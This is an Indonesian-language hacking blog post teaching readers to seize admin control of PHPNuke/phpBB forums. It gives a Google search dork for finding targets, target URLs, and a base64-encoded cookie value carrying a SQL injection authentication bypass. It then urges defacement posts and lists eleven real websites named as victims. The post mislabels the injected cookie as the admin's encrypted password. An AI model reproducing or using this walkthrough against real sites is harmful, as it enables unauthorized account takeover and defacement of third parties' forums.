Menjadi Administrator Forum Website di PHPNuke 7.2.0

Salam hangat Untuk IT di tanah airku indonesia.
Berlanjut ke postingan saya tentang dunia hacking yang begitu luas dan kalau di bahas tidak ada habisnya, lanjut sajalah dari pada saya banyak bicara.

Langkah awal yang kalian harus hadapi adalah:
- Persiapan untuk membuka website google.com
- Koneksi yang cukup untuk browsing
- Ketelitian untuk memahami postingan ini
- Jangan jenuh untuk mempelajari bahasan ini

Langsung saja kita bahas :

1. Kita buka site favorit yaitu google.coom dengan search ketik allinurl:modules.php?name=Forums
2. Masukkan contoh web yang akan di jadikan target contoh:
http://www.vocaloid-user.net/modules.php?name=Forums&file=  lalu tambahkan script berikut Forums&file=profile&mode=viewprofile&u=2   jadi seperti ini contohnya http://www.vocaloid-user.net/modules.php?name=Forums&file=  
3.  jadi seperti ini situsnya
http://www.vocaloid-user.net/modules.php?name=Forums&file=profile&mode=viewprofile&u=2
mengapa u=2 karena dalam Sintaks SQL User admin adalah user_id=2

setelah kalian inject, kalian akan mendapatkan Cookie pada halaman atas berbentuk seperti ini
Welcome x' UNION SELECT 2,null,'pass',1,null/*:pass
4. Jika kalian telah mendapat hal seperti ituh bisa di katakan kalian udah berhasil melihat
Profile sang admin Forum,setelah kalian bisa melihat profile dari sang admin coba masukan

script ini Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
menjadi http://www.vocaloid-user.net/modules.php?name=Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
koq ada eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz <-= apa ya?
5. oke saya akan menjelaskan sedikit itu adalah encrypt dari password sang admin yang
di enkripsi menggunakan PHP.Dan kalian akan melihat bahwa kalian sekarang sudah menjadi
admin Forum, tandanya adalah adanya tanda Log Out pada atas halaman Forum seperti ini

Forum FAQ   Search   Usergroups   Profile   No new messages   Log out [ admin ]
6. tapi jika ngga berhasil kalian akan menemukan seperti ini
Forum FAQ   Search   Usergroups   Profile   Log in to check your private messages   Log in

Jika kalian telah mendapatkan ada Link Log Out berarti kalian udah berhasil menjadi admin
Forum di website itu, tinggal kalian mau apa terserah bisa juga tambah posting seperti ini

[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]

tanda [B] adalah kode dari PHPBB yang artinya Bold
setelah semuanya selesai jangan lupa Log Out ya
mungkin hanya ituh tulisan dari saya silakan kalian kembangkan sendiri
Ini ada beberapa situs yg menjadi korban :

http://www.peakoilaction.org/modules.php?name=Forums&file=viewtopic&p=89&sid=6b1361fa7c773d87eb394259d95f9464#89
http://www.vocaloid-user.net/modules.php?name=Forums&file=viewtopic&p=1477#1477
http://www.albini.net/modules.php?name=Forums&file=viewtopic&p=841&sid=dc54b0f611d4422e1c1b5579acbbb7ad#841
http://www.prepressforums.com/modules.php?name=Forums&file=viewtopic&p=6700#6700
http://www.portaljava.com/home/modules.php?name=Forums&file=viewtopic&p=26789#26789
http://www.monster-hardware.com/modules.php?name=Forums&file=viewtopic&p=18490#18490
http://www.acmqueue.org/modules.php?name=Forums&file=viewtopic&t=102&sid=845b8cfe7904a7fa9dc9702ec797ac00
http://www.drishtipat.org/nuke/modules.php?name=Forums&file=viewtopic&t=162
http://www.crosstowntraffic.net/modules.php?name=Forums&file=viewtopic&t=12&sid=365caed4a7459800664770415d37468c
http://www.totalrekall.co.uk/modules.php?name=Forums&file=viewtopic&t=227&sid=bd6481d7fa39ac6df4a70eecb06076f8
http://www.glug-howrah.org/modules.php?name=Forums&file=viewtopic&t=81&sid=7e7a56550dcd951bd99e5685e1cfc18a

yang lainnya silakan anda cari sendiri

NB: - Script ini hanya bekerja pada phpbb2.0.6
       - Sumber berasal dari Klik disni
       - Tulisan yang di ganti maupun yang di ubah sudah beratas namakan Si sumber berikut.